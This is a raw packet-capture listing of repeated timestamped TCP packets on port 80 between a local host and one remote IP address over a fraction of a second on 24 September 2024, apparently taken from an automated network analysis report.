                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718081951 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718090057 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718103886 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718121052 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718127966 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718138933 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718144894 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718149900 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718158007 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718169928 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718183041 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718214989 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718214989 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718306065 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718513012 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718521118 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718528986 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718544006 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718569994 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718578100 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718592882 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718592882 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718600035 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718607903 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718616009 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718635082 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718635082 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718641043 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718673944 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.718713999 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754441977 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754461050 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754467010 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754527092 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754534006 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754534006 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754534960 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754548073 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754559994 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754618883 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754620075 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754637957 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.754848003 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773595095 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773652077 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773668051 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773684025 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773777008 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773777008 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773782015 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773791075 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773808956 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773817062 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773839951 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773870945 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773916006 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773924112 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773938894 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773946047 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773962975 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773987055 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.773987055 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774018049 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774039030 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774118900 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774127960 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774141073 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774149895 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774163961 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774189949 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774189949 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774229050 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774422884 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774430037 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774439096 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774446011 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774454117 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774460077 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774467945 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774475098 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774482965 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774491072 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774498940 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774507046 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774514914 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774518967 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774580956 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774751902 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774802923 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774811029 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774820089 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774827003 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774846077 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.774868011 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775060892 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775070906 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775079012 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775087118 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775094986 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775101900 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775110006 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775119066 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775125980 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775130033 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775135040 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775144100 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775147915 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775187969 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775187969 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775391102 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775403976 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775449038 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775509119 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775516987 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775523901 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775532007 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775541067 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775547981 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775578022 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775590897 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775654078 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775662899 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775715113 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775791883 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775800943 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775809050 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775832891 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775840998 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775849104 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775849104 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775859118 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775873899 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775881052 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775892019 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775892973 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775923967 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775926113 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775934935 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775942087 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775949955 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775949955 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775959015 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775966883 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775974035 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775983095 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775985003 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775990963 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.775999069 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776006937 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776014090 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776020050 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776021004 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776027918 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776096106 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776096106 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776694059 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776702881 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776710033 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776716948 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776725054 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776732922 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776740074 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776750088 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776757002 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776766062 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776786089 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776793003 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776798010 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776799917 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776808977 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776815891 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776823044 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776823044 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776830912 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776838064 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776845932 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776853085 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776864052 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.776911974 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777304888 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777312994 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777321100 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777328014 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777335882 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777343035 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777349949 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777357101 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777358055 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777370930 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777379036 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777385950 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777394056 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777401924 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777409077 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777411938 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777419090 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777421951 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777427912 CEST8049734103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777467012 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.777503014 CEST4973480192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.806749105 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.806797028 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.806804895 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.806888103 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.806895971 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.806904078 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.806910038 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.806984901 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807030916 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807085037 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807085037 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807244062 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807296038 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807310104 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807380915 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807399988 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807404995 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807409048 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807415962 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807425976 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807529926 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807559967 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807568073 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807583094 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807590961 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807607889 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807615042 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807651997 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807651997 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807696104 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807703972 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807718039 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807750940 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807790995 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807853937 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807862043 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807877064 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807910919 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807923079 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807929993 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807945013 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807976007 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.807976007 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808065891 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808073997 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808084011 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808132887 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808198929 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808207989 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808214903 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808222055 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808238029 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808245897 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808245897 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808260918 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808265924 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808299065 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808314085 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808377028 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808444023 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808451891 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808466911 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808474064 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808487892 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808495045 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808535099 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808599949 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808613062 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808615923 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808665991 CEST4973580192.168.2.8103.130.147.211
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808737993 CEST8049735103.130.147.211192.168.2.8
                                                                                                                                                                                                                              Sep 24, 2024 15:34:31.808746099 CEST8049735103.130.147.211192.168.2.8
